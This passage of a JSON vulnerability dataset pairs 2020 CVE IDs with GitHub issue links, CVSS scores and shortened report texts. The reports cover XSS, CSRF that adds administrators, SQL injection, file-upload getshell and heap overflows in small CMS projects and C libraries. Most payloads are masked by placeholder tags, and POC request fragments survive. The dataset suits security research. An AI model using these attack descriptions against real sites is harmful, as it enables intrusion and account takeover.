  52711. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52712. "severity": "MEDIUM",
  52713. "baseScore": 6.1,
  52714. "impactScore": 2.7,
  52715. "exploitabilityScore": 2.8
  52716. },
  52717. {
  52718. "CVE_ID": "CVE-2020-20598",
  52719. "Issue_Url_old": "https://github.com/xuhuisheng/lemon/issues/199",
  52720. "Issue_Url_new": "https://github.com/xuhuisheng/lemon/issues/199",
  52721. "Repo_new": "xuhuisheng/lemon",
  52722. "Issue_Created_At": "2019-10-15T11:40:35Z",
  52723. "description": "Csrf + Xss combination Can be obtained user cookie. Place of backstage exists Csrf Vulnerability,attacker Structure a csrf APITAG the administrator clicks on the malicious link, the component information is automatically add. There is an xss in the place of Editing component FILETAG We can write an xss first, and then construct the csrf code, so that after the account clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the account visits the page , he can get him Cookie Csrf Exp: ERRORTAG FILETAG",
  52724. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52725. "severity": "MEDIUM",
  52726. "baseScore": 6.1,
  52727. "impactScore": 2.7,
  52728. "exploitabilityScore": 2.8
  52729. },
  52730. {
  52731. "CVE_ID": "CVE-2020-20600",
  52732. "Issue_Url_old": "https://github.com/alixiaowei/cve_test/issues/2",
  52733. "Issue_Url_new": "https://github.com/alixiaowei/cve_test/issues/2",
  52734. "Repo_new": "alixiaowei/cve_test",
  52735. "Issue_Created_At": "2019-10-16T10:06:25Z",
  52736. "description": "APITAG beta stored Cross Site Scripting Vulnerability. Vulnerability Name: Metinfo CMS stored XSS Vulnerability Product Homepage: FILETAG Software link: FILETAG Version NUMBERTAG beta Payload: APITAG file path: PATHTAG line NUMBERTAG code in line NUMBERTAG ERRORTAG Can see APITAG value, did some not filter, and judge some conditions after, and finally write APITAG save to the database in POC\uff1a CODETAG FILETAG FILETAG",
  52737. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52738. "severity": "MEDIUM",
  52739. "baseScore": 5.4,
  52740. "impactScore": 2.7,
  52741. "exploitabilityScore": 2.3
  52742. },
  52743. {
  52744. "CVE_ID": "CVE-2020-20605",
  52745. "Issue_Url_old": "https://github.com/xuzijia/blog/issues/4",
  52746. "Issue_Url_new": "https://github.com/xuzijia/blog/issues/4",
  52747. "Repo_new": "xuzijia/blog",
  52748. "Issue_Created_At": "2019-09-26T08:15:10Z",
  52749. "description": "Blog CMS NUMBERTAG feedback have a xss vulnerability. \u672a\u8fdb\u884c\u8fc7\u6ee4\u4ee5\u53ca\u5b9e\u4f53\u5316\u7528\u6237\u8f93\u5165\u7684\u5185\u5bb9 \u6709\u6548\u8d1f\u8377\uff1a PATHTAG ) APITAG PATHTAG APITAG \u4ee3\u7801\uff1a FILETAG \u7ed3\u679c\uff1a FILETAG FILETAG",
  52750. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52751. "severity": "MEDIUM",
  52752. "baseScore": 6.1,
  52753. "impactScore": 2.7,
  52754. "exploitabilityScore": 2.8
  52755. },
  52756. {
  52757. "CVE_ID": "CVE-2020-20642",
  52758. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/5",
  52759. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/5",
  52760. "Repo_new": "weng-xianhu/eyoucms",
  52761. "Issue_Created_At": "2019-10-09T08:29:30Z",
  52762. "description": "CSRF vulnerability can add htm page to generate XSS. This CSRF vulnerability can add htm page and execute js code such as XSS. This problem was found in APITAG NUMBERTAG This CSRF vulnerability can add an htm page via APITAG After the administrator logs in, he visits the page constructed by the attacker and triggers exp. The htm page will be created in the specified path. The page contains the attacker's js code, which can cause XSS or other problems. CODETAG Poc request packet FILETAG After the csrf vulnerability is triggered, the htm page is created and the reflective XSS is executed. FILETAG",
  52763. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  52764. "severity": "HIGH",
  52765. "baseScore": 8.8,
  52766. "impactScore": 5.9,
  52767. "exploitabilityScore": 2.8
  52768. },
  52769. {
  52770. "CVE_ID": "CVE-2020-20645",
  52771. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/6",
  52772. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/6",
  52773. "Repo_new": "weng-xianhu/eyoucms",
  52774. "Issue_Created_At": "2019-10-12T07:01:02Z",
  52775. "description": "There is a stored xss in basic_information(\u57fa\u672c\u4fe1\u606f). Tested in NUMBERTAG ersion FILETAG FILETAG",
  52776. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52777. "severity": "MEDIUM",
  52778. "baseScore": 5.4,
  52779. "impactScore": 2.7,
  52780. "exploitabilityScore": 2.3
  52781. },
  52782. {
  52783. "CVE_ID": "CVE-2020-20657",
  52784. "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/1",
  52785. "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/1",
  52786. "Repo_new": "fcovatti/libiec_iccp_mod",
  52787. "Issue_Created_At": "2019-10-10T02:31:18Z",
  52788. "description": "Potential heap buffer overflow found at mms_client_example1.c. Hello, I found a potential heap buffer overflow in PATHTAG APITAG are steps followed to reproduce crash__ Download latest source code from: PATHTAG compiled with clang and ASAN APITAG __ASAN Output__: ERRORTAG",
  52789. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  52790. "severity": "HIGH",
  52791. "baseScore": 7.5,
  52792. "impactScore": 3.6,
  52793. "exploitabilityScore": 3.9
  52794. },
  52795. {
  52796. "CVE_ID": "CVE-2020-20658",
  52797. "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/2",
  52798. "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/2",
  52799. "Repo_new": "fcovatti/libiec_iccp_mod",
  52800. "Issue_Created_At": "2019-10-10T03:44:20Z",
  52801. "description": "Potenial heap buffer overflow found at mms_client_example1.c different from issues1. Hello, I found a potential heap buffer overflow in PATHTAG but unable to locate the trace code, however the deeper cause is found in: PATHTAG when the program try to calloc a large spcae, caused the heap buffer overflow. Below are steps followed to reproduce crash Download latest source code from: PATHTAG compiled with clang and APITAG CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" before make Row data FILETAG ASAN Output: ERRORTAG",
  52802. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  52803. "severity": "HIGH",
  52804. "baseScore": 7.5,
  52805. "impactScore": 3.6,
  52806. "exploitabilityScore": 3.9
  52807. },
  52808. {
  52809. "CVE_ID": "CVE-2020-20662",
  52810. "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/6",
  52811. "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/6",
  52812. "Repo_new": "fcovatti/libiec_iccp_mod",
  52813. "Issue_Created_At": "2019-10-10T07:02:23Z",
  52814. "description": "Heap buffer overflow found at mms_client_example1.c. Hello, I found a potential heap buffer overflow in PATHTAG APITAG are steps followed to reproduce crash__ Download latest source code from: PATHTAG compiled with clang and ASAN APITAG before make __ROW data__: APITAG APITAG __ASAN Output__: ERRORTAG",
  52815. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  52816. "severity": "MEDIUM",
  52817. "baseScore": 6.5,
  52818. "impactScore": 3.6,
  52819. "exploitabilityScore": 2.8
  52820. },
  52821. {
  52822. "CVE_ID": "CVE-2020-20663",
  52823. "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/7",
  52824. "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/7",
  52825. "Repo_new": "fcovatti/libiec_iccp_mod",
  52826. "Issue_Created_At": "2019-10-10T07:08:43Z",
  52827. "description": "Heap buffer overflow found at mms_client_example1.c different from issues NUMBERTAG Hello, I found a potential heap buffer overflow in PATHTAG but unable to locate the trace code, however the deeper cause is found in: PATHTAG when the program try to calloc a large spcae, caused the heap buffer overflow. APITAG are steps followed to reproduce crash__ Download latest source code from: PATHTAG compiled with clang and ASAN APITAG before make APITAG data__ FILETAG ASAN Output: ERRORTAG",
  52828. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  52829. "severity": "MEDIUM",
  52830. "baseScore": 6.5,
  52831. "impactScore": 3.6,
  52832. "exploitabilityScore": 2.8
  52833. },
  52834. {
  52835. "CVE_ID": "CVE-2020-20664",
  52836. "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/8",
  52837. "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/8",
  52838. "Repo_new": "fcovatti/libiec_iccp_mod",
  52839. "Issue_Created_At": "2019-10-11T02:11:50Z",
  52840. "description": "SEGV found in server_example1. Hello, I found a __SEGV__ in PATHTAG APITAG are steps followed to reproduce crash__ Download latest source code from: PATHTAG compiled with clang and ASAN APITAG before make APITAG data__ FILETAG __ASAN Output__ ERRORTAG",
  52841. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  52842. "severity": "MEDIUM",
  52843. "baseScore": 6.5,
  52844. "impactScore": 3.6,
  52845. "exploitabilityScore": 2.8
  52846. },
  52847. {
  52848. "CVE_ID": "CVE-2020-20665",
  52849. "Issue_Url_old": "https://github.com/cloudwu/rudp/issues/6",
  52850. "Issue_Url_new": "https://github.com/cloudwu/rudp/issues/6",
  52851. "Repo_new": "cloudwu/rudp",
  52852. "Issue_Created_At": "2019-11-06T08:21:48Z",
  52853. "description": "Memory leak found at APITAG Hello, I found a __MEMORY LEAK__ in APITAG APITAG are steps followed to reproduce crash__ Download latest source code from: URLTAG compiled with clang and ASAN APITAG before make __ASAN Output__ ''' APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG e9d NUMBERTAG PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). ''' it seems that you have a double free issue.",
  52854. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  52855. "severity": "HIGH",
  52856. "baseScore": 7.5,
  52857. "impactScore": 3.6,
  52858. "exploitabilityScore": 3.9
  52859. },
  52860. {
  52861. "CVE_ID": "CVE-2020-20670",
  52862. "Issue_Url_old": "https://github.com/yilezhu/Czar.Cms/issues/6",
  52863. "Issue_Url_new": "https://github.com/yilezhu/czar.cms/issues/6",
  52864. "Repo_new": "yilezhu/czar.cms",
  52865. "Issue_Created_At": "2019-10-11T08:36:25Z",
  52866. "description": "Arbitrary file upload vulnerability exists in the background. Can upload Html Cause fishing attacks \uff0c APITAG Code execution FILETAG url \uff1a URLTAG poc NUMBERTAG Content Disposition: form data; name=\"file\"; APITAG Content Type: application/octet stream hello world NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; name=\"size NUMBERTAG FILETAG",
  52867. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  52868. "severity": "HIGH",
  52869. "baseScore": 8.8,
  52870. "impactScore": 5.9,
  52871. "exploitabilityScore": 2.8
  52872. },
  52873. {
  52874. "CVE_ID": "CVE-2020-20671",
  52875. "Issue_Url_old": "https://github.com/Kitesky/KiteCMS/issues/3",
  52876. "Issue_Url_new": "https://github.com/kitesky/kitecms/issues/3",
  52877. "Repo_new": "kitesky/kitecms",
  52878. "Issue_Created_At": "2019-10-12T03:14:35Z",
  52879. "description": "There is CSRF and Arbitrary file upload vulnerability getshell. SCRF : add administrator user Edit Upload options Upload php file getshell CSRF POC: FILETAG Edit Upload options FILETAG Upload php file getshell FILETAG FILETAG FILETAG",
  52880. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  52881. "severity": "HIGH",
  52882. "baseScore": 8.8,
  52883. "impactScore": 5.9,
  52884. "exploitabilityScore": 2.8
  52885. },
  52886. {
  52887. "CVE_ID": "CVE-2020-20691",
  52888. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/461",
  52889. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/461",
  52890. "Repo_new": "monstra-cms/monstra",
  52891. "Issue_Created_At": "2019-10-11T08:24:25Z",
  52892. "description": "bypassed extension filter in uploading process different before. Brief of this vulnerability",
  52893. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  52894. "severity": "MEDIUM",
  52895. "baseScore": 6.5,
  52896. "impactScore": 2.5,
  52897. "exploitabilityScore": 3.9
  52898. },
  52899. {
  52900. "CVE_ID": "CVE-2020-20692",
  52901. "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/50",
  52902. "Issue_Url_new": "https://github.com/gilacms/gila/issues/50",
  52903. "Repo_new": "gilacms/gila",
  52904. "Issue_Created_At": "2019-10-13T09:33:27Z",
  52905. "description": "SQL injection in Gila CMS version NUMBERTAG I installed the latest version of APITAG APITAG After the administrator log in to the website, the search for the sql injection vulnerability exists in the content >pages >posts page. Vulnerability related code The vulnerability related code is in lines NUMBERTAG to NUMBERTAG of PATHTAG the parameter $_GET is not filtered, and the line is directly brought into the APITAG function to perform data query in line NUMBERTAG resulting in sql injection. ERRORTAG Vulnerability certificate Visit URLTAG you can see that the returned content has the result of the sql statement execution is NUMBERTAG Send get packet ERRORTAG Response package CODETAG",
  52906. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  52907. "severity": "HIGH",
  52908. "baseScore": 7.2,
  52909. "impactScore": 5.9,
  52910. "exploitabilityScore": 1.2
  52911. },
  52912. {
  52913. "CVE_ID": "CVE-2020-20693",
  52914. "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/51",
  52915. "Issue_Url_new": "https://github.com/gilacms/gila/issues/51",
  52916. "Repo_new": "gilacms/gila",
  52917. "Issue_Created_At": "2019-10-13T16:20:44Z",
  52918. "description": "There is a CSRF vulnerability that can add an administrator account. CSRF vulnerability There is a CSRF vulnerability to add an administrator account After the administrator logged in, open the following page poc APITAG add an administrator accoun ERRORTAG Screenshots NUMBERTAG Access dangerous pages FILETAG FILETAG NUMBERTAG Found that an administrator has been added FILETAG Impact version Version NUMBERTAG",
  52919. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  52920. "severity": "HIGH",
  52921. "baseScore": 8.8,
  52922. "impactScore": 5.9,
  52923. "exploitabilityScore": 2.8
  52924. },
  52925. {
  52926. "CVE_ID": "CVE-2020-20695",
  52927. "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/52",
  52928. "Issue_Url_new": "https://github.com/gilacms/gila/issues/52",
  52929. "Repo_new": "gilacms/gila",
  52930. "Issue_Created_At": "2019-10-14T03:08:48Z",
  52931. "description": "Storage type xss by uploading svg files. Version impacted NUMBERTAG ulnerability details(POC) The file with the suffix .svg saves the following code. After uploading to the server, you can execute any js code. If the ordinary user has permission to upload files, the administrator user accidentally accesses the malicious svg uploaded by the user, then the ordinary user. It is possible to obtain the cookie information of the administrator user, resulting in an increase in the rights of the ordinary user. It is dangerous for the system to allow uploading svg files. CODETAG FILETAG Access the file and find that malicious code has been executed FILETAG",
  52932. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52933. "severity": "MEDIUM",
  52934. "baseScore": 5.4,
  52935. "impactScore": 2.7,
  52936. "exploitabilityScore": 2.3
  52937. },
  52938. {
  52939. "CVE_ID": "CVE-2020-20696",
  52940. "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/53",
  52941. "Issue_Url_new": "https://github.com/gilacms/gila/issues/53",
  52942. "Repo_new": "gilacms/gila",
  52943. "Issue_Created_At": "2019-10-15T03:43:22Z",
  52944. "description": "FILETAG FILETAG Repair opinion Encoding the submitted content of the Tags content",
  52945. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52946. "severity": "MEDIUM",
  52947. "baseScore": 5.4,
  52948. "impactScore": 2.7,
  52949. "exploitabilityScore": 2.3
  52950. },
  52951. {
  52952. "CVE_ID": "CVE-2020-20739",
  52953. "Issue_Url_old": "https://github.com/libvips/libvips/issues/1419",
  52954. "Issue_Url_new": "https://github.com/libvips/libvips/issues/1419",
  52955. "Repo_new": "libvips/libvips",
  52956. "Issue_Created_At": "2019-09-03T11:59:50Z",
  52957. "description": "Uninitialized variable: mode in function APITAG PATHTAG When the output file does not contain a \":\"\uff0cthe uninitialization of the mode causes the stack information to leak. This may cause the leakage of remote server path. APITAG APITAG",
  52958. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  52959. "severity": "MEDIUM",
  52960. "baseScore": 5.3,
  52961. "impactScore": 1.4,
  52962. "exploitabilityScore": 3.9
  52963. },
  52964. {
  52965. "CVE_ID": "CVE-2020-20740",
  52966. "Issue_Url_old": "https://github.com/enferex/pdfresurrect/issues/14",
  52967. "Issue_Url_new": "https://github.com/enferex/pdfresurrect/issues/14",
  52968. "Repo_new": "enferex/pdfresurrect",
  52969. "Issue_Created_At": "2020-07-24T02:17:52Z",
  52970. "description": "The lack of a complete magic check leads to heap buffer overflow in APITAG commit APITAG os version: ubuntu NUMBERTAG CODETAG ERRORTAG build arg\uff1a ERRORTAG FILETAG",
  52971. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  52972. "severity": "HIGH",
  52973. "baseScore": 7.8,
  52974. "impactScore": 5.9,
  52975. "exploitabilityScore": 1.8
  52976. },
  52977. {
  52978. "CVE_ID": "CVE-2020-20781",
  52979. "Issue_Url_old": "https://github.com/forget-code/ucms/issues/1",
  52980. "Issue_Url_new": "https://github.com/forget-code/ucms/issues/1",
  52981. "Repo_new": "forget-code/ucms",
  52982. "Issue_Created_At": "2019-10-21T02:27:11Z",
  52983. "description": "The title, key words, description and content of the article are all stored XSS.. The title and key words of the article can be described by using payload NUMBERTAG APITAG APITAG use payload: APITAG",
  52984. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52985. "severity": "MEDIUM",
  52986. "baseScore": 5.4,
  52987. "impactScore": 2.7,
  52988. "exploitabilityScore": 2.3
  52989. },
  52990. {
  52991. "CVE_ID": "CVE-2020-20796",
  52992. "Issue_Url_old": "https://github.com/FlameNET/FlameCMS/issues/24",
  52993. "Issue_Url_new": "https://github.com/flamenet/flamecms/issues/24",
  52994. "Repo_new": "flamenet/flamecms",
  52995. "Issue_Created_At": "2019-10-16T16:47:47Z",
  52996. "description": "sql injection vulnerability . hello There is a sql injection vulnerability here\uff1a FILETAG APITAG URLTAG APITAG payload: id NUMBERTAG UNION ALL SELECT APITAG APITAG",
  52997. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52998. "severity": "CRITICAL",
  52999. "baseScore": 9.8,
  53000. "impactScore": 5.9,
  53001. "exploitabilityScore": 3.9
  53002. },
  53003. {
  53004. "CVE_ID": "CVE-2020-20797",
  53005. "Issue_Url_old": "https://github.com/FlameNET/FlameCMS/issues/26",
  53006. "Issue_Url_new": "https://github.com/flamenet/flamecms/issues/26",
  53007. "Repo_new": "flamenet/flamecms",
  53008. "Issue_Created_At": "2019-10-17T10:02:26Z",
  53009. "description": "sql injection vulnerability NUMBERTAG Hello There is a Time based blind injection vulnerability here too\uff1a PATHTAG APITAG APITAG poc \uff1a POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Referer: URLTAG Cookie: APITAG APITAG mprtcl APITAG c8d NUMBERTAG c NUMBERTAG ba NUMBERTAG c8a'|'das NUMBERTAG a NUMBERTAG f NUMBERTAG afe NUMBERTAG f NUMBERTAG a NUMBERTAG APITAG APITAG XDEBUG_SESSION NUMBERTAG Upgrade Insecure Requests NUMBERTAG csrftoken NUMBERTAG d NUMBERTAG c NUMBERTAG ad NUMBERTAG fa2 b3be APITAG APITAG APITAG Time based injection and need to write the new APITAG everytime to test APITAG APITAG APITAG",
  53010. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53011. "severity": "CRITICAL",
  53012. "baseScore": 9.8,
  53013. "impactScore": 5.9,
  53014. "exploitabilityScore": 3.9
  53015. },
  53016. {
  53017. "CVE_ID": "CVE-2020-20799",
  53018. "Issue_Url_old": "https://github.com/blackjliuyun/cvetest/issues/1",
  53019. "Issue_Url_new": "https://github.com/blackjliuyun/cvetest/issues/1",
  53020. "Repo_new": "blackjliuyun/cvetest",
  53021. "Issue_Created_At": "2019-11-19T05:08:06Z",
  53022. "description": "jeecms commentary exists storage type xss. product: jeecms \uff08 FILETAG \uff09 version NUMBERTAG There is a storage type of xss, which is triggered in the foreground after the user submits the comment and the background audit is passed. poc\uff1a POST /usercomment HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Content Type: application/json JEECMS Auth Token: APITAG APITAG APITAG APITAG Redirect Header: false X Requested With: APITAG Content Length NUMBERTAG Connection: close Referer: URLTAG Cookie: APITAG APITAG mprtcl APITAG c8d NUMBERTAG c NUMBERTAG ba NUMBERTAG c8a'|'das NUMBERTAG a NUMBERTAG f NUMBERTAG afe NUMBERTAG f NUMBERTAG a NUMBERTAG APITAG zh_choose=s; APITAG JIDENTITY=be NUMBERTAG c NUMBERTAG f NUMBERTAG d NUMBERTAG b0e df NUMBERTAG cdd9; APITAG _site_id_cookie NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG",
  53023. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  53024. "severity": "MEDIUM",
  53025. "baseScore": 5.4,
  53026. "impactScore": 2.7,
  53027. "exploitabilityScore": 2.3
  53028. },
  53029. {
  53030. "CVE_ID": "CVE-2020-20907",
  53031. "Issue_Url_old": "https://github.com/cby234/cve_request/issues/2",
  53032. "Issue_Url_new": "https://github.com/cby234/cve_request/issues/2",
  53033. "Repo_new": "cby234/cve_request",
  53034. "Issue_Created_At": "2021-05-17T10:07:19Z",
  53035. "description": "metinfo NUMBERTAG beta remote delete ini file. Vulnerability Name: Metinfo CMS ini file modify vulnerability Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG beta APITAG vulnerability only occur in Window OS) In PATHTAG APITAG Method FILETAG In this method We can find editor and site parameter makes filename value and use it for delfile method's argument FILETAG Let's take a look at PATHTAG source code FILETAG When we check delfile method we use filename argument for APITAG function and if return value is true unlink filename argument file will be unlink Before we analyze more about this point. Let's take a look at about APITAG function's difference between in Linux and Windows FILETAG FILETAG In Linux (first picture) if there is no real dirctory which name is asdf function do not return true value unliness there is APITAG value. But In Windows APITAG funciotn return true value if there is fake directory which name is asdf (second picture). Because of this point we can delete remote ini file in windows server Attack scenario is below NUMBERTAG give site parameter value for 'admin' or 'web' and give editor parameter for PATHTAG POC : PATHTAG FILETAG FILETAG FILETAG",
  53036. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  53037. "severity": "CRITICAL",
  53038. "baseScore": 9.1,
  53039. "impactScore": 5.2,
  53040. "exploitabilityScore": 3.9
  53041. },
  53042. {
  53043. "CVE_ID": "CVE-2020-20948",
  53044. "Issue_Url_old": "https://github.com/zhangdaiscott/jeecg/issues/50",
  53045. "Issue_Url_new": "https://github.com/zhangdaiscott/jeecg/issues/50",
  53046. "Repo_new": "zhangdaiscott/jeecg",
  53047. "Issue_Created_At": "2019-11-12T12:44:04Z",
  53048. "description": "There is a Arbitrary File Download vulnerability in NUMBERTAG From the FILETAG , we can figure out that we are able to access PATHTAG FILETAG and then we go to the source code: FILETAG as you can see, the variable \"imgurl\" is a direct combination of several strings ,and there is no filter for \"dbpath\", so we can use the payload to download any file APITAG By the way, the variable APITAG is configured in the file APITAG , and its default value is APITAG FILETAG So , if someone uses this application on Linux and modify the default value of APITAG to APITAG (or another location ) , then, an attacker can exploit it to read some sensitive file! FILETAG FILETAG",
  53049. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  53050. "severity": "HIGH",
  53051. "baseScore": 7.5,
  53052. "impactScore": 3.6,
  53053. "exploitabilityScore": 3.9
  53054. },
  53055. {
  53056. "CVE_ID": "CVE-2020-20951",
  53057. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/84",
  53058. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/84",
  53059. "Repo_new": "pluck-cms/pluck",
  53060. "Issue_Created_At": "2019-10-21T11:36:30Z",
  53061. "description": "Pluck NUMBERTAG de NUMBERTAG admin background exists a remote command execution vulnerability when uploading files. This vulnerability applies to php NUMBERTAG FILETAG After the installation is successful, go to the management background FILETAG Then upload FILETAG , It will be changed to FILETAG FILETAG Then upload FILETAG again FILETAG FILETAG has not been changed to FILETAG FILETAG then view FILETAG FILETAG",
  53062. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53063. "severity": "CRITICAL",
  53064. "baseScore": 9.8,
  53065. "impactScore": 5.9,
  53066. "exploitabilityScore": 3.9
  53067. },
  53068. {
  53069. "CVE_ID": "CVE-2020-20971",
  53070. "Issue_Url_old": "https://github.com/TplusSs/PbootCMS/issues/1",
  53071. "Issue_Url_new": "https://github.com/tplusss/pbootcms/issues/1",
  53072. "Repo_new": "tplusss/pbootcms",
  53073. "Issue_Created_At": "2019-12-13T03:02:37Z",
  53074. "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open this APITAG page FILETAG CODETAG Then open the PATHTAG page to see the added system administrator",
  53075. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  53076. "severity": "HIGH",
  53077. "baseScore": 8.8,
  53078. "impactScore": 5.9,
  53079. "exploitabilityScore": 2.8
  53080. },
  53081. {
  53082. "CVE_ID": "CVE-2020-20977",
  53083. "Issue_Url_old": "https://github.com/yxcmf/ukcms/issues/6",
  53084. "Issue_Url_new": "https://github.com/yxcmf/ukcms/issues/6",
  53085. "Repo_new": "yxcmf/ukcms",
  53086. "Issue_Created_At": "2019-11-02T09:18:25Z",
  53087. "description": "APITAG NUMBERTAG APITAG alert NUMBERTAG APITAG \u63d0\u4ea4 FILETAG FILETAG NUMBERTAG FILETAG FILETAG",
  53088. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  53089. "severity": "MEDIUM",
  53090. "baseScore": 5.4,
  53091. "impactScore": 2.7,
  53092. "exploitabilityScore": 2.3
  53093. },
  53094. {
  53095. "CVE_ID": "CVE-2020-20979",
  53096. "Issue_Url_old": "https://github.com/0xyu/PHP_Learning/issues/2",
  53097. "Issue_Url_new": "https://github.com/0xyu/php_learning/issues/2",
  53098. "Repo_new": "0xyu/PHP_Learning",
  53099. "Issue_Created_At": "2019-10-14T15:08:06Z",
  53100. "description": "LJCMS Version NUMBERTAG R NUMBERTAG Arbitrary file upload vulnerability (latest version). Vulnerability Name : LJCMS Version NUMBERTAG R NUMBERTAG Arbitrary file upload vulnerability (latest version) Product Homepage : FILETAG Software link : FILETAG Version NUMBERTAG Location : PATHTAG Code \uff1a CODETAG NUMBERTAG Get the variable $_FILES NUMBERTAG Replace APITAG with APITAG NUMBERTAG Set the saved file name to time + random number + get the suffix name NUMBERTAG Set different save paths according to the file suffi NUMBERTAG Without any restrictions on the suffix name NUMBERTAG Executing APITAG caused an arbitrary file upload vulnerability test : So we can upload a normal photo first in the avatar upload. FILETAG modify, Upload success FILETAG getshell FILETAG",
  53101. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53102. "severity": "CRITICAL",
  53103. "baseScore": 9.8,
  53104. "impactScore": 5.9,
  53105. "exploitabilityScore": 3.9
  53106. },
  53107. {
  53108. "CVE_ID": "CVE-2020-20981",
  53109. "Issue_Url_old": "https://github.com/yao123123123/CVE/issues/1",
  53110. "Issue_Url_new": "https://github.com/yao123123123/cve/issues/1",
  53111. "Repo_new": "yao123123123/CVE",
  53112. "Issue_Created_At": "2019-11-03T02:55:47Z",
  53113. "description": "Metinfo NUMBERTAG APITAG Vulnerability Name: Metinfo CMS Background SQL Blind Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG PATHTAG Line NUMBERTAG public function APITAG global $_M; $id = isset($_M FILETAG second\uff1a\uff1b poc:id FILETAG If set the code as NUMBERTAG we can find delete the log data success. FILETAG",
